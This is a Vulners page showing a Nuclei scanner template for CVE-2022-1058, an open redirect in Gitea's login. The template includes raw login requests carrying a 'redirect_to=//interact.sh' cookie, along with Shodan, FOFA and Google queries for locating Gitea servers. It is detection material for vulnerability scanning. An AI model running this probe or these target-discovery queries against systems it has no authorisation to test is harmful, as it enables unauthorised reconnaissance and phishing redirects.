| Reporter | Title | Published | Views | Family All 26 |
|---|---|---|---|---|
| Open Redirect on login | 23 Mar 202211:11 | – | huntr | |
| Open Redirect on follow/unfollow user's profile action | 7 Jun 202307:33 | – | huntr | |
| gitea -- Open Redirect on login | 23 Mar 202200:00 | – | freebsd | |
| CVE-2022-1058 | 24 Mar 202215:15 | – | attackerkb | |
| CVE-2022-1058 | 24 Mar 202217:29 | – | circl | |
| Gitea 输入验证错误漏洞 | 24 Mar 202200:00 | – | cnnvd | |
| CVE-2022-1058 | 24 Mar 202214:15 | – | cve | |
| CVE-2022-1058 Open Redirect on login in go-gitea/gitea | 24 Mar 202214:15 | – | cvelist | |
| EUVD-2022-1315 | 24 Mar 202214:15 | – | euvd | |
| FreeBSD : gitea -- Open Redirect on login (83466f76-aefe-11ec-b4b6-d05099c0c059) | 29 Mar 202200:00 | – | nessus |
id: CVE-2022-1058
info:
name: Gitea <1.16.5 - Open Redirect
author: theamanrawat
severity: medium
description: |
Gitea before 1.16.5 is susceptible to open redirect via GitHub repository go-gitea/gitea. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
impact: |
An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.
remediation: |
Upgrade Gitea to version 1.16.5 or later to fix the open redirect vulnerability.
reference:
- https://github.com/go-gitea/gitea/commit/e3d8e92bdc67562783de9a76b5b7842b68daeb48
- https://huntr.dev/bounties/4fb42144-ac70-4f76-a5e1-ef6b5e55dc0d
- https://nvd.nist.gov/vuln/detail/CVE-2022-1058
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-1058
cwe-id: CWE-601
epss-score: 0.53177
epss-percentile: 0.9885
cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: gitea
product: gitea
shodan-query:
- title:"Gitea"
- http.html:"powered by gitea version"
- http.title:"gitea"
- cpe:"cpe:2.3:a:gitea:gitea"
fofa-query:
- body="powered by gitea version"
- title="gitea"
google-query: intitle:"gitea"
tags: cve,cve2022,huntr,open-redirect,gitea,vuln
http:
- raw:
- |
GET /user/login HTTP/1.1
Host: {{Hostname}}
- |
POST /user/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: redirect_to=//interact.sh
_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}
matchers-condition: and
matchers:
- type: word
part: header_2
words:
- "//interact.sh"
- type: status
status:
- 302
extractors:
- type: regex
name: csrf
group: 1
regex:
- 'name="_csrf" value="(.*)"'
internal: true
# digest: 4b0a0048304602210095372a50c4b8f39adad47c2babb72627e8d76493fc66dd7d7155eaf0979bc902022100aaa17152b67e40bdf71b1ec0f5af9530191b03af190631545ce409432a74b3c3:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation